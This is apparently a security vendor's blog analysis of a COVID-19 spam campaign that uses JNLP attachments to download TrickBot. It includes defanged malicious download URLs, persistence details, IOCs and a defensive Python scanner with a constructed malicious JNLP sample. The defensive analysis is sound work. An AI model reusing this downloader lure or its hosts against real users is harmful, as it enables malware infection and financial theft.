
TrickBot Disguised as COVID-19 Map

Cybercriminals continue to exploit the Coronavirus (COVID-19) pandemic. While monitoring COVID-19-related spam, we recently spotted an interesting campaign that uses an unusual email attachment to deliver the TrickBot malware.

Figure 1: The spam campaign flow

The Road to TrickBot

The email, claiming to come from a volunteer organization that helps people seeking COVID-19 financial aid, entices the recipient to open the attachments, which pose as COVID-19 forms.

Figure 2: Trustwave Secure Email Gateway displaying a recent COVID-19 spam

The attachments are Java Network Launch Protocol (JNLP) files. A JNLP file is an XML document that tells Java Web Start which Java program to fetch from a remote server (the "codebase") and run on the client machine. If the client has a Java Runtime Environment (JRE) that includes Java Web Start, double-clicking a JNLP file is enough to execute it. Java Web Start ships with Oracle JRE 8 and earlier and was removed in Java 11, so the lure only works on hosts that still run an older JRE.

In Figure 2, the two JNLP attachments are identical. Once executed, they download and run the Java program “map.jar” hosted at “http[s]://mapcovid[.]net”, a second-stage downloader disguised as a COVID-19 “Map” Java program.

Figure 3: The attachment SARS-2_Form.jnlp, a fake COVID-19 form, is a downloader

Figure 4: The second-stage downloader “map.jar” downloads and executes the main malware “map.exe”

The downloaded “map.jar” opens the World Health Organization’s (WHO) “Q&A on coronaviruses (COVID-19)” webpage as a decoy while it carries out its real job: downloading and installing the main malware. That payload, also disguised as a COVID-19 “Map” executable, is fetched from “http[s]://basecovid[.]com/map[.]exe”, saved as %appdata%\map.exe and executed.

The second downloaded file, “map.exe”, is the modular banking trojan TrickBot. TrickBot is prominent because of its wide range of functionality: stealing information, downloading other malware, sending spam, and more.

The TrickBot binary at %appdata%\map.exe is launched by the Execute() function of “map.jar”. Once running, it creates its installation folder, SpotifyMusic, in the Startup folder and drops a copy of itself there. It also writes an encrypted file, “settings.ini”, that holds the TrickBot configuration.

Figure 5: Installation path of the downloaded TrickBot

Figure 6: Decrypted TrickBot configuration

The decrypted configuration contains the information TrickBot needs to communicate with its command-and-control (C&C) servers: the version of the installed “map.exe” and its group tag <gtag>, the list of C&C IP addresses, and the first module that “map.exe” should download.

Figure 7: Memory dump of TrickBot “map.exe” showing the first request to its C&C

Summary

Malware authors continue to take advantage of the COVID-19 pandemic in their spam. Like other cybercriminals, the threat actors behind this TrickBot campaign are applying their creativity to the initial arrival vector. We usually observe TrickBot delivered as the payload of malicious document attachments, particularly macro downloaders. This is the first time we have seen TrickBot use JNLP files as downloaders; in fact, JNLP email attachments are rarely used to deliver malware at all.

We expect to see more of this kind of threat. We recommend blocking *.jnlp files at your email gateway and, because an attachment can arrive under a generic MIME type such as application/octet-stream, matching on the file content (the <jnlp> root element) as well as on the extension. We have added protections for this threat to the Trustwave Secure Email Gateway for our customers.
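To make that recommendation concrete, the following is an added example (not Trustwave's tooling, and not the real SARS-2_Form.jnlp) that performs the triage from Figures 3 and 4 at the gateway: it walks a raw message, identifies JNLP attachments by extension, declared MIME type or the <jnlp> root element, and extracts the codebase and jar each one would fetch. The sample message is constructed to mirror this campaign; the JNLP layout, the main class map.Main, the <all-permissions/> element and the sender and recipient addresses are assumptions.

```python
"""Triage JNLP e-mail attachments: find them, then extract the remote Java
code each one would launch.

Added example for this post; it is not Trustwave's own tooling and does not
reproduce the real SARS-2_Form.jnlp. The sample message below is constructed
to mirror the described campaign (a .jnlp attachment whose codebase is
mapcovid[.]net and whose jar is map.jar); the XML layout, main class and
addresses are assumptions.
"""
import email
from email import policy
from email.message import EmailMessage
from urllib.parse import urljoin
import xml.etree.ElementTree as ET

JNLP_MIME = "application/x-java-jnlp-file"

# Constructed JNLP resembling what Figure 3 describes; not the real attachment.
SAMPLE_JNLP = b"""<?xml version="1.0" encoding="UTF-8"?>
<jnlp spec="1.0+" codebase="https://mapcovid.net" href="SARS-2_Form.jnlp">
  <information>
    <title>COVID-19 Map</title>
    <vendor>Volunteer Organization</vendor>
  </information>
  <security><all-permissions/></security>
  <resources>
    <j2se version="1.6+"/>
    <jar href="map.jar" main="true"/>
  </resources>
  <application-desc main-class="map.Main"/>
</jnlp>
"""


def is_jnlp(part) -> bool:
    """Classify a MIME part as JNLP by extension, declared type, or content.

    All three checks matter: a rule on the MIME type alone misses a part sent
    as application/octet-stream, and a rule on *.jnlp alone misses a part whose
    name was changed but whose body still starts with a <jnlp> element.
    """
    name = (part.get_filename() or "").lower()
    if name.endswith(".jnlp") or part.get_content_type() == JNLP_MIME:
        return True
    payload = part.get_payload(decode=True) or b""
    return b"<jnlp" in payload.lstrip()[:512].lower()


def jnlp_targets(xml_bytes: bytes) -> dict:
    """Return what a JNLP file would fetch and run, with jar hrefs resolved."""
    root = ET.fromstring(xml_bytes)
    codebase = root.get("codebase", "")
    base = codebase.rstrip("/") + "/" if codebase else ""
    jars = [urljoin(base, j.get("href", "")) for j in root.iter("jar")]
    desc = root.find("application-desc")
    return {
        "codebase": codebase,
        "jars": jars,
        "main_class": desc.get("main-class") if desc is not None else None,
        # <all-permissions/> asks Java Web Start for full local privileges
        "all_permissions": root.find("security/all-permissions") is not None,
    }


def scan_message(raw: bytes) -> list:
    """Walk a raw RFC 822 message and report every JNLP attachment found."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.is_multipart() or not is_jnlp(part):
            continue
        info = {"filename": part.get_filename(),
                "declared_type": part.get_content_type()}
        try:
            info.update(jnlp_targets(part.get_payload(decode=True)))
        except ET.ParseError as exc:
            info["error"] = f"malformed JNLP: {exc}"
        findings.append(info)
    return findings


def build_sample_message() -> bytes:
    """Constructed lure carrying the same JNLP twice, as the post describes."""
    m = EmailMessage()
    m["From"] = "volunteer@example.org"      # assumed address
    m["To"] = "recipient@example.com"        # assumed address
    m["Subject"] = "COVID-19 financial aid form"
    m.set_content("Please complete the attached forms to apply for aid.")
    m.add_attachment(SAMPLE_JNLP, maintype="application",
                     subtype="x-java-jnlp-file", filename="SARS-2_Form.jnlp")
    # Same bytes under a generic type: the MIME-type check alone would miss it.
    m.add_attachment(SAMPLE_JNLP, maintype="application",
                     subtype="octet-stream", filename="SARS-2_Form.jnlp")
    return m.as_bytes()


if __name__ == "__main__":
    for finding in scan_message(build_sample_message()):
        print(finding)
```

On the constructed message this reports two findings, both resolving to https://mapcovid.net/map.jar with all-permissions requested; the second attachment is declared application/octet-stream, which is why the classifier looks at the extension and the content rather than the declared type alone. To use it on live mail, pass the raw bytes of an .eml file to scan_message().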

 

IOCs

Files
SARS-2_Form.jnlp    SHA1: 46576bfebaecaacc4600bba429016b0713238f52
map.jar             SHA1: 0068154fbc4374642ebe50ac4f822c64b45635c8
map.exe             SHA1: 55b031294ff24919547cfcb4fd4f10a02902ce3b

Network
mapcovid[.]net (hosts the second-stage downloader map.jar)
http[s]://basecovid[.]com/map[.]exe (TrickBot payload)

Host
%appdata%\map.exe
SpotifyMusic folder in the Startup folder, containing a copy of map.exe and the encrypted settings.ini
